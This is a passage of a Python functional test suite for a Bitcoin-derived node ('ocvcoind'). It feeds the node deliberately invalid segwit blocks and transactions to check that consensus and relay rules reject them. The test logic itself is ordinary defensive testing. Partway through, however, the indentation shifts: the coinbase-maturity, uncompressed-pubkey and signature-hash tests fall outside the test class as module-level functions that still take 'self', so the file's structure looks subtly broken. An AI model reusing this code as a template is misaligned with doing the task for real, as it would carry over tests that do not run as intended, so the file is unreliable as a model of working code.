        cur_length = len(block.vtx[-1].wit.vtxinwit[0].scriptWitness.stack[0])
        block.vtx[-1].wit.vtxinwit[0].scriptWitness.stack[0] = b'a' * (cur_length - 1)
        block.vtx[0].vout.pop()
        add_witness_commitment(block)
        block.solve()
        assert get_virtual_size(block) == MAX_BLOCK_BASE_SIZE
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        # Update available utxo's
        self.utxo.pop(0)
        self.utxo.append(UTXO(block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue))
    @subtest  # type: ignore
    def test_submit_block(self):
        """Test that submitblock adds the nonce automatically when possible.

        The node can only fill in the default (all-zero) witness nonce; a
        custom nonce, or a missing commitment with a non-empty witness,
        must be rejected."""
        block = self.build_next_block()
        # Try using a custom nonce and then don't supply it.
        # This shouldn't possibly work.
        add_witness_commitment(block, nonce=1)
        block.vtx[0].wit = CTxWitness()  # drop the nonce
        block.solve()
        assert_equal('bad-witness-merkle-match', self.nodes[0].submitblock(block.serialize().hex()))
        assert self.nodes[0].getbestblockhash() != block.hash
        # Now redo commitment with the standard nonce, but let ocvcoind fill it in.
        add_witness_commitment(block, nonce=0)
        block.vtx[0].wit = CTxWitness()
        block.solve()
        assert_equal(None, self.nodes[0].submitblock(block.serialize().hex()))
        assert_equal(self.nodes[0].getbestblockhash(), block.hash)
        # This time, add a tx with non-empty witness, but don't supply
        # the commitment.
        block_2 = self.build_next_block()
        add_witness_commitment(block_2)
        block_2.solve()
        # Drop commitment and nonce -- submitblock should not fill in.
        block_2.vtx[0].vout.pop()
        block_2.vtx[0].wit = CTxWitness()
        assert_equal('bad-txnmrklroot', self.nodes[0].submitblock(block_2.serialize().hex()))
        # Tip should not advance!
        assert self.nodes[0].getbestblockhash() != block_2.hash
    @subtest  # type: ignore
    def test_extra_witness_data(self):
        """Test extra witness data in a transaction.

        Extra witness items are never allowed; extra scriptSig data is fine
        on a non-witness input but invalid on a witness input."""
        block = self.build_next_block()
        witness_program = CScript([OP_DROP, OP_TRUE])
        script_pubkey = script_to_p2wsh_script(witness_program)
        # First try extra witness data on a tx that doesn't require a witness
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        tx.vout.append(CTxOut(self.utxo[0].nValue - 2000, script_pubkey))
        tx.vout.append(CTxOut(1000, CScript([OP_TRUE])))  # non-witness output
        tx.wit.vtxinwit.append(CTxInWitness())
        tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([])]
        tx.rehash()
        self.update_witness_block_with_transactions(block, [tx])
        # Extra witness data should not be allowed.
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Try extra signature data. Ok if we're not spending a witness output.
        block.vtx[1].wit.vtxinwit = []
        block.vtx[1].vin[0].scriptSig = CScript([OP_0])
        block.vtx[1].rehash()
        add_witness_commitment(block)
        block.solve()
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        # Now try extra witness/signature data on an input that DOES require a
        # witness
        tx2 = CTransaction()
        tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))  # witness output
        tx2.vin.append(CTxIn(COutPoint(tx.sha256, 1), b""))  # non-witness
        tx2.vout.append(CTxOut(tx.vout[0].nValue, CScript([OP_TRUE])))
        tx2.wit.vtxinwit.extend([CTxInWitness(), CTxInWitness()])
        # First stack item below is the "extra" witness element.
        tx2.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)]), CScript([CScriptNum(1)]), witness_program]
        tx2.wit.vtxinwit[1].scriptWitness.stack = [CScript([OP_TRUE])]
        block = self.build_next_block()
        self.update_witness_block_with_transactions(block, [tx2])
        # This has extra witness data, so it should fail.
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Now get rid of the extra witness, but add extra scriptSig data
        tx2.vin[0].scriptSig = CScript([OP_TRUE])
        tx2.vin[1].scriptSig = CScript([OP_TRUE])
        tx2.wit.vtxinwit[0].scriptWitness.stack.pop(0)
        tx2.wit.vtxinwit[1].scriptWitness.stack = []
        tx2.rehash()
        add_witness_commitment(block)
        block.solve()
        # This has extra signature data for a witness input, so it should fail.
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Now get rid of the extra scriptsig on the witness input, and verify
        # success (even with extra scriptsig data in the non-witness input)
        tx2.vin[0].scriptSig = b""
        tx2.rehash()
        add_witness_commitment(block)
        block.solve()
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        # Update utxo for later tests
        self.utxo.pop(0)
        self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
    @subtest  # type: ignore
    def test_max_witness_push_length(self):
        """Test that witness stack can only allow up to 520 byte pushes.

        A MAX_SCRIPT_ELEMENT_SIZE + 1 element is rejected in a block; the
        same block with the element trimmed to the limit is accepted."""
        block = self.build_next_block()
        witness_program = CScript([OP_DROP, OP_TRUE])
        script_pubkey = script_to_p2wsh_script(witness_program)
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
        tx.rehash()
        tx2 = CTransaction()
        tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
        tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
        tx2.wit.vtxinwit.append(CTxInWitness())
        # First try a 521-byte stack element
        tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a' * (MAX_SCRIPT_ELEMENT_SIZE + 1), witness_program]
        tx2.rehash()
        self.update_witness_block_with_transactions(block, [tx, tx2])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Now reduce the length of the stack element
        tx2.wit.vtxinwit[0].scriptWitness.stack[0] = b'a' * (MAX_SCRIPT_ELEMENT_SIZE)
        add_witness_commitment(block)
        block.solve()
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        # Update the utxo for later tests
        self.utxo.pop()
        self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
    @subtest  # type: ignore
    def test_max_witness_program_length(self):
        """Test that witness outputs greater than 10kB can't be spent.

        A witness program of MAX_PROGRAM_LENGTH + 1 bytes is unspendable;
        one byte shorter is spendable."""
        MAX_PROGRAM_LENGTH = 10000
        # This program is 19 max pushes (9937 bytes), then 64 more opcode-bytes.
        long_witness_program = CScript([b'a' * MAX_SCRIPT_ELEMENT_SIZE] * 19 + [OP_DROP] * 63 + [OP_TRUE])
        assert len(long_witness_program) == MAX_PROGRAM_LENGTH + 1
        long_script_pubkey = script_to_p2wsh_script(long_witness_program)
        block = self.build_next_block()
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, long_script_pubkey))
        tx.rehash()
        tx2 = CTransaction()
        tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
        tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
        tx2.wit.vtxinwit.append(CTxInWitness())
        tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a'] * 44 + [long_witness_program]
        tx2.rehash()
        self.update_witness_block_with_transactions(block, [tx, tx2])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Try again with one less byte in the witness program
        witness_program = CScript([b'a' * MAX_SCRIPT_ELEMENT_SIZE] * 19 + [OP_DROP] * 62 + [OP_TRUE])
        assert len(witness_program) == MAX_PROGRAM_LENGTH
        script_pubkey = script_to_p2wsh_script(witness_program)
        tx.vout[0] = CTxOut(tx.vout[0].nValue, script_pubkey)
        tx.rehash()
        tx2.vin[0].prevout.hash = tx.sha256
        # One less OP_DROP in the program, so one less dummy stack item.
        tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a'] * 43 + [witness_program]
        tx2.rehash()
        block.vtx = [block.vtx[0]]
        self.update_witness_block_with_transactions(block, [tx, tx2])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        self.utxo.pop()
        self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
    @subtest  # type: ignore
    def test_witness_input_length(self):
        """Test that vin length must match vtxinwit length.

        Uses a custom serializer that does NOT pad/truncate vtxinwit to the
        vin length, so mismatched lengths actually hit the wire."""
        witness_program = CScript([OP_DROP, OP_TRUE])
        script_pubkey = script_to_p2wsh_script(witness_program)
        # Create a transaction that splits our utxo into many outputs
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        value = self.utxo[0].nValue
        for _ in range(10):
            tx.vout.append(CTxOut(int(value / 10), script_pubkey))
        tx.vout[0].nValue -= 1000
        assert tx.vout[0].nValue >= 0
        block = self.build_next_block()
        self.update_witness_block_with_transactions(block, [tx])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        # Try various ways to spend tx that should all break.
        # This "broken" transaction serializer will not normalize
        # the length of vtxinwit.
        class BrokenCTransaction(CTransaction):
            def serialize_with_witness(self):
                """Serialize exactly as stored, without fixing up vtxinwit."""
                flags = 0
                if not self.wit.is_null():
                    flags |= 1
                r = b""
                r += struct.pack("<i", self.nVersion)
                if flags:
                    # BIP 144 marker (empty vin vector) + flag byte.
                    dummy = []
                    r += ser_vector(dummy)
                    r += struct.pack("<B", flags)
                r += ser_vector(self.vin)
                r += ser_vector(self.vout)
                if flags & 1:
                    r += self.wit.serialize()
                r += struct.pack("<I", self.nLockTime)
                return r
        tx2 = BrokenCTransaction()
        for i in range(10):
            tx2.vin.append(CTxIn(COutPoint(tx.sha256, i), b""))
        tx2.vout.append(CTxOut(value - 3000, CScript([OP_TRUE])))
        # First try using a too long vtxinwit
        for i in range(11):
            tx2.wit.vtxinwit.append(CTxInWitness())
            tx2.wit.vtxinwit[i].scriptWitness.stack = [b'a', witness_program]
        block = self.build_next_block()
        self.update_witness_block_with_transactions(block, [tx2])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Now try using a too short vtxinwit
        tx2.wit.vtxinwit.pop()
        tx2.wit.vtxinwit.pop()
        block.vtx = [block.vtx[0]]
        self.update_witness_block_with_transactions(block, [tx2])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Now make one of the intermediate witnesses be incorrect
        tx2.wit.vtxinwit.append(CTxInWitness())
        tx2.wit.vtxinwit[-1].scriptWitness.stack = [b'a', witness_program]
        tx2.wit.vtxinwit[5].scriptWitness.stack = [witness_program]
        block.vtx = [block.vtx[0]]
        self.update_witness_block_with_transactions(block, [tx2])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Fix the broken witness and the block should be accepted.
        tx2.wit.vtxinwit[5].scriptWitness.stack = [b'a', witness_program]
        block.vtx = [block.vtx[0]]
        self.update_witness_block_with_transactions(block, [tx2])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        self.utxo.pop()
        self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
    @subtest  # type: ignore
    def test_tx_relay_after_segwit_activation(self):
        """Test transaction relay after segwit activation.

        After segwit activates, verify that mempool:
        - rejects transactions with unnecessary/extra witnesses
        - accepts transactions with valid witnesses
        and that witness transactions are relayed to non-upgraded peers."""
        # Generate a transaction that doesn't require a witness, but send it
        # with a witness. Should be rejected because we can't use a witness
        # when spending a non-witness output.
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
        tx.wit.vtxinwit.append(CTxInWitness())
        tx.wit.vtxinwit[0].scriptWitness.stack = [b'a']
        tx.rehash()
        tx_hash = tx.sha256
        # Verify that unnecessary witnesses are rejected.
        self.test_node.announce_tx_and_wait_for_getdata(tx)
        assert_equal(len(self.nodes[0].getrawmempool()), 0)
        test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=False)
        # Verify that removing the witness succeeds.
        test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
        # Now try to add extra witness data to a valid witness tx.
        witness_program = CScript([OP_TRUE])
        script_pubkey = script_to_p2wsh_script(witness_program)
        tx2 = CTransaction()
        tx2.vin.append(CTxIn(COutPoint(tx_hash, 0), b""))
        tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
        tx2.rehash()
        tx3 = CTransaction()
        tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
        tx3.wit.vtxinwit.append(CTxInWitness())
        # Add too-large for IsStandard witness and check that it does not enter reject filter
        p2sh_program = CScript([OP_TRUE])
        witness_program2 = CScript([b'a' * 400000])
        tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, script_to_p2sh_script(p2sh_program)))
        tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program2]
        tx3.rehash()
        # Node will not be blinded to the transaction, requesting it any number of times
        # if it is being announced via txid relay.
        # Node will be blinded to the transaction via wtxid, however.
        self.std_node.announce_tx_and_wait_for_getdata(tx3)
        self.std_wtx_node.announce_tx_and_wait_for_getdata(tx3, use_wtxid=True)
        test_transaction_acceptance(self.nodes[1], self.std_node, tx3, True, False, 'tx-size')
        self.std_node.announce_tx_and_wait_for_getdata(tx3)
        self.std_wtx_node.announce_tx_and_wait_for_getdata(tx3, use_wtxid=True, success=False)
        # Remove witness stuffing, instead add extra witness push on stack
        tx3.vout[0] = CTxOut(tx2.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))
        tx3.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)]), witness_program]
        tx3.rehash()
        test_transaction_acceptance(self.nodes[0], self.test_node, tx2, with_witness=True, accepted=True)
        test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=False)
        # Get rid of the extra witness, and verify acceptance.
        tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
        # Also check that old_node gets a tx announcement, even though this is
        # a witness transaction.
        self.old_node.wait_for_inv([CInv(MSG_TX, tx2.sha256)])  # wait until tx2 was inv'ed
        test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=True)
        self.old_node.wait_for_inv([CInv(MSG_TX, tx3.sha256)])
        # Test that getrawtransaction returns correct witness information
        # hash, size, vsize
        raw_tx = self.nodes[0].getrawtransaction(tx3.hash, 1)
        assert_equal(int(raw_tx["hash"], 16), tx3.calc_sha256(True))
        assert_equal(raw_tx["size"], len(tx3.serialize_with_witness()))
        # weight = base_size * 3 + total_size (BIP 141)
        weight = len(tx3.serialize_with_witness()) + 3 * len(tx3.serialize_without_witness())
        vsize = math.ceil(weight / 4)
        assert_equal(raw_tx["vsize"], vsize)
        assert_equal(raw_tx["weight"], weight)
        assert_equal(len(raw_tx["vin"][0]["txinwitness"]), 1)
        assert_equal(raw_tx["vin"][0]["txinwitness"][0], witness_program.hex())
        assert vsize != raw_tx["size"]
        # Cleanup: mine the transactions and update utxo for next test
        self.nodes[0].generate(1)
        assert_equal(len(self.nodes[0].getrawmempool()), 0)
        self.utxo.pop(0)
        self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
    @subtest  # type: ignore
    def test_segwit_versions(self):
        """Test validity of future segwit version transactions.

        Future segwit versions are non-standard to spend, but valid in blocks.
        Sending to future segwit versions is always allowed.
        Can run this before and after segwit activation."""
        NUM_SEGWIT_VERSIONS = 17  # will test OP_0, OP_1, ..., OP_16
        if len(self.utxo) < NUM_SEGWIT_VERSIONS:
            # Split the single utxo so each version gets its own output.
            tx = CTransaction()
            tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
            split_value = (self.utxo[0].nValue - 4000) // NUM_SEGWIT_VERSIONS
            for _ in range(NUM_SEGWIT_VERSIONS):
                tx.vout.append(CTxOut(split_value, CScript([OP_TRUE])))
            tx.rehash()
            block = self.build_next_block()
            self.update_witness_block_with_transactions(block, [tx])
            test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
            self.utxo.pop(0)
            for i in range(NUM_SEGWIT_VERSIONS):
                self.utxo.append(UTXO(tx.sha256, i, split_value))
        self.sync_blocks()
        temp_utxo = []
        tx = CTransaction()
        witness_program = CScript([OP_TRUE])
        witness_hash = sha256(witness_program)
        assert_equal(len(self.nodes[1].getrawmempool()), 0)
        for version in list(range(OP_1, OP_16 + 1)) + [OP_0]:
            # First try to spend to a future version segwit script_pubkey.
            if version == OP_1:
                # Don't use 32-byte v1 witness (used by Taproot; see BIP 341)
                script_pubkey = CScript([CScriptOp(version), witness_hash + b'\x00'])
            else:
                script_pubkey = CScript([CScriptOp(version), witness_hash])
            tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b"")]
            tx.vout = [CTxOut(self.utxo[0].nValue - 1000, script_pubkey)]
            tx.rehash()
            # Non-standard for the policy node, but fine for the permissive node.
            test_transaction_acceptance(self.nodes[1], self.std_node, tx, with_witness=True, accepted=False)
            test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=True)
            self.utxo.pop(0)
            temp_utxo.append(UTXO(tx.sha256, 0, tx.vout[0].nValue))
        self.nodes[0].generate(1)  # Mine all the transactions
        self.sync_blocks()
        assert len(self.nodes[0].getrawmempool()) == 0
        # Finally, verify that version 0 -> version 2 transactions
        # are standard
        script_pubkey = CScript([CScriptOp(OP_2), witness_hash])
        tx2 = CTransaction()
        tx2.vin = [CTxIn(COutPoint(tx.sha256, 0), b"")]
        tx2.vout = [CTxOut(tx.vout[0].nValue - 1000, script_pubkey)]
        tx2.wit.vtxinwit.append(CTxInWitness())
        tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
        tx2.rehash()
        # Gets accepted to both policy-enforcing nodes and others.
        test_transaction_acceptance(self.nodes[0], self.test_node, tx2, with_witness=True, accepted=True)
        test_transaction_acceptance(self.nodes[1], self.std_node, tx2, with_witness=True, accepted=True)
        temp_utxo.pop()  # last entry in temp_utxo was the output we just spent
        temp_utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
        # Spend everything in temp_utxo into an segwit v1 output.
        tx3 = CTransaction()
        total_value = 0
        for i in temp_utxo:
            tx3.vin.append(CTxIn(COutPoint(i.sha256, i.n), b""))
            tx3.wit.vtxinwit.append(CTxInWitness())
            total_value += i.nValue
            tx3.wit.vtxinwit[-1].scriptWitness.stack = [witness_program]
        tx3.vout.append(CTxOut(total_value - 1000, script_pubkey))
        tx3.rehash()
        # First we test this transaction against fRequireStandard=true node
        # making sure the txid is added to the reject filter
        self.std_node.announce_tx_and_wait_for_getdata(tx3)
        test_transaction_acceptance(self.nodes[1], self.std_node, tx3, with_witness=True, accepted=False, reason="bad-txns-nonstandard-inputs")
        # Now the node will no longer ask for getdata of this transaction when advertised by same txid
        self.std_node.announce_tx_and_wait_for_getdata(tx3, success=False)
        # Spending a higher version witness output is not allowed by policy,
        # even with fRequireStandard=false.
        test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=False, reason="reserved for soft-fork upgrades")
        # Building a block with the transaction must be valid, however.
        block = self.build_next_block()
        self.update_witness_block_with_transactions(block, [tx2, tx3])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        self.sync_blocks()
        # Add utxo to our list
        self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest  # type: ignore
def test_premature_coinbase_witness_spend(self):
    """Test that a witness output in a coinbase cannot be spent before it matures.

    Builds a block whose coinbase pays to a P2WSH output, then attempts to
    spend it at 99 confirmations (rejected) and at 100 confirmations
    (accepted).
    """
    block = self.build_next_block()
    # Change the output of the block to be a witness output.
    witness_program = CScript([OP_TRUE])
    script_pubkey = script_to_p2wsh_script(witness_program)
    block.vtx[0].vout[0].scriptPubKey = script_pubkey
    # This next line will rehash the coinbase and update the merkle
    # root, and solve.
    self.update_witness_block_with_transactions(block, [])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    # Build the coinbase spend up front; the same transaction object is
    # submitted for both the premature and the mature attempt.
    spend_tx = CTransaction()
    spend_tx.vin = [CTxIn(COutPoint(block.vtx[0].sha256, 0), b"")]
    spend_tx.vout = [CTxOut(block.vtx[0].vout[0].nValue, witness_program)]
    spend_tx.wit.vtxinwit.append(CTxInWitness())
    spend_tx.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
    spend_tx.rehash()

    # Now test a premature spend.
    self.nodes[0].generate(98)
    self.sync_blocks()
    block2 = self.build_next_block()
    self.update_witness_block_with_transactions(block2, [spend_tx])
    test_witness_block(self.nodes[0], self.test_node, block2, accepted=False)

    # Advancing one more block should allow the spend.
    self.nodes[0].generate(1)
    block2 = self.build_next_block()
    self.update_witness_block_with_transactions(block2, [spend_tx])
    test_witness_block(self.nodes[0], self.test_node, block2, accepted=True)
    self.sync_blocks()
@subtest  # type: ignore
def test_uncompressed_pubkey(self):
    """Test uncompressed pubkey validity in segwit transactions.

    Uncompressed pubkeys are no longer supported in default relay policy,
    but (for now) are still valid in blocks.  Exercises P2WPKH, P2WSH,
    P2SH(P2WSH), and plain legacy P2PKH spends with an uncompressed key.
    """
    # Segwit transactions using uncompressed pubkeys are not accepted
    # under default policy, but should still pass consensus.
    key = ECKey()
    key.generate(False)
    pubkey = key.get_pubkey().get_bytes()
    assert_equal(len(pubkey), 65)  # This should be an uncompressed pubkey

    utxo = self.utxo.pop(0)

    # Test 1: P2WPKH
    # First create a P2WPKH output that uses an uncompressed pubkey
    pubkeyhash = hash160(pubkey)
    script_pkh = key_to_p2wpkh_script(pubkey)
    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(utxo.sha256, utxo.n), b""))
    tx.vout.append(CTxOut(utxo.nValue - 1000, script_pkh))
    tx.rehash()

    # Confirm it in a block.
    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    # Now try to spend it. Send it to a P2WSH output, which we'll
    # use in the next test.
    witness_program = CScript([pubkey, CScriptOp(OP_CHECKSIG)])
    script_wsh = script_to_p2wsh_script(witness_program)

    tx2 = CTransaction()
    tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
    tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_wsh))
    # The v0 sighash for a P2WPKH input commits to the corresponding
    # P2PKH script and the amount being spent.
    script = keyhash_to_p2pkh_script(pubkeyhash)
    sig_hash = SegwitV0SignatureHash(script, tx2, 0, SIGHASH_ALL, tx.vout[0].nValue)
    signature = key.sign_ecdsa(sig_hash) + b'\x01'  # 0x1 is SIGHASH_ALL
    tx2.wit.vtxinwit.append(CTxInWitness())
    tx2.wit.vtxinwit[0].scriptWitness.stack = [signature, pubkey]
    tx2.rehash()

    # Should fail policy test.
    test_transaction_acceptance(self.nodes[0], self.test_node, tx2, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
    # But passes consensus.
    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx2])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    # Test 2: P2WSH
    # Try to spend the P2WSH output created in last test.
    # Send it to a P2SH(P2WSH) output, which we'll use in the next test.
    script_p2sh = script_to_p2sh_script(script_wsh)
    script_sig = CScript([script_wsh])

    tx3 = CTransaction()
    tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
    tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, script_p2sh))
    tx3.wit.vtxinwit.append(CTxInWitness())
    sign_p2pk_witness_input(witness_program, tx3, 0, SIGHASH_ALL, tx2.vout[0].nValue, key)

    # Should fail policy test.
    test_transaction_acceptance(self.nodes[0], self.test_node, tx3, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
    # But passes consensus.
    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx3])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    # Test 3: P2SH(P2WSH)
    # Try to spend the P2SH output created in the last test.
    # Send it to a P2PKH output, which we'll use in the next test.
    script_pubkey = keyhash_to_p2pkh_script(pubkeyhash)

    tx4 = CTransaction()
    tx4.vin.append(CTxIn(COutPoint(tx3.sha256, 0), script_sig))
    tx4.vout.append(CTxOut(tx3.vout[0].nValue - 1000, script_pubkey))
    tx4.wit.vtxinwit.append(CTxInWitness())
    sign_p2pk_witness_input(witness_program, tx4, 0, SIGHASH_ALL, tx3.vout[0].nValue, key)

    # Should fail policy test.
    test_transaction_acceptance(self.nodes[0], self.test_node, tx4, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx4])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    # Test 4: Uncompressed pubkeys should still be valid in non-segwit
    # transactions.
    tx5 = CTransaction()
    tx5.vin.append(CTxIn(COutPoint(tx4.sha256, 0), b""))
    tx5.vout.append(CTxOut(tx4.vout[0].nValue - 1000, CScript([OP_TRUE])))
    (sig_hash, err) = LegacySignatureHash(script_pubkey, tx5, 0, SIGHASH_ALL)
    signature = key.sign_ecdsa(sig_hash) + b'\x01'  # 0x1 is SIGHASH_ALL
    tx5.vin[0].scriptSig = CScript([signature, pubkey])
    tx5.rehash()
    # Should pass policy and consensus.
    test_transaction_acceptance(self.nodes[0], self.test_node, tx5, True, True)
    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx5])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
    self.utxo.append(UTXO(tx5.sha256, 0, tx5.vout[0].nValue))
@subtest  # type: ignore
def test_signature_version_1(self):
    """Test version-1 (segwit v0) signature-hash behavior.

    Covers: the amount commitment in the sighash (too-large / too-small
    input values must fail), every SIGHASH type with and without
    ANYONECANPAY, randomized hashtype combinations including
    SIGHASH_SINGLE with an out-of-bounds input index, and the rule that a
    P2WSH spend's signature must live in the witness, not the scriptSig.
    """
    key = ECKey()
    key.generate()
    pubkey = key.get_pubkey().get_bytes()

    witness_program = CScript([pubkey, CScriptOp(OP_CHECKSIG)])
    script_pubkey = script_to_p2wsh_script(witness_program)

    # First create a witness output for use in the tests.
    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
    tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
    tx.rehash()

    test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=True)
    # Mine this transaction in preparation for following tests.
    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
    self.sync_blocks()
    self.utxo.pop(0)

    # Test each hashtype
    prev_utxo = UTXO(tx.sha256, 0, tx.vout[0].nValue)
    for sigflag in [0, SIGHASH_ANYONECANPAY]:
        for hashtype in [SIGHASH_ALL, SIGHASH_NONE, SIGHASH_SINGLE]:
            hashtype |= sigflag
            block = self.build_next_block()
            tx = CTransaction()
            tx.vin.append(CTxIn(COutPoint(prev_utxo.sha256, prev_utxo.n), b""))
            tx.vout.append(CTxOut(prev_utxo.nValue - 1000, script_pubkey))
            tx.wit.vtxinwit.append(CTxInWitness())
            # Too-large input value
            sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue + 1, key)
            self.update_witness_block_with_transactions(block, [tx])
            test_witness_block(self.nodes[0], self.test_node, block, accepted=False)

            # Too-small input value
            sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue - 1, key)
            block.vtx.pop()  # remove last tx
            self.update_witness_block_with_transactions(block, [tx])
            test_witness_block(self.nodes[0], self.test_node, block, accepted=False)

            # Now try correct value
            sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue, key)
            block.vtx.pop()
            self.update_witness_block_with_transactions(block, [tx])
            test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

            prev_utxo = UTXO(tx.sha256, 0, tx.vout[0].nValue)

    # Test combinations of signature hashes.
    # Split the utxo into a lot of outputs.
    # Randomly choose up to 10 to spend, sign with different hashtypes, and
    # output to a random number of outputs. Repeat NUM_SIGHASH_TESTS times.
    # Ensure that we've tested a situation where we use SIGHASH_SINGLE with
    # an input index > number of outputs.
    NUM_SIGHASH_TESTS = 500
    temp_utxos = []
    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(prev_utxo.sha256, prev_utxo.n), b""))
    split_value = prev_utxo.nValue // NUM_SIGHASH_TESTS
    for _ in range(NUM_SIGHASH_TESTS):
        tx.vout.append(CTxOut(split_value, script_pubkey))
    tx.wit.vtxinwit.append(CTxInWitness())
    sign_p2pk_witness_input(witness_program, tx, 0, SIGHASH_ALL, prev_utxo.nValue, key)
    for i in range(NUM_SIGHASH_TESTS):
        temp_utxos.append(UTXO(tx.sha256, i, split_value))

    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    block = self.build_next_block()
    used_sighash_single_out_of_bounds = False
    for i in range(NUM_SIGHASH_TESTS):
        # Ping regularly to keep the connection alive
        if (not i % 100):
            self.test_node.sync_with_ping()
        # Choose random number of inputs to use.
        num_inputs = random.randint(1, 10)
        # Create a slight bias for producing more utxos
        num_outputs = random.randint(1, 11)
        random.shuffle(temp_utxos)
        assert len(temp_utxos) > num_inputs
        tx = CTransaction()
        total_value = 0
        for i in range(num_inputs):
            tx.vin.append(CTxIn(COutPoint(temp_utxos[i].sha256, temp_utxos[i].n), b""))
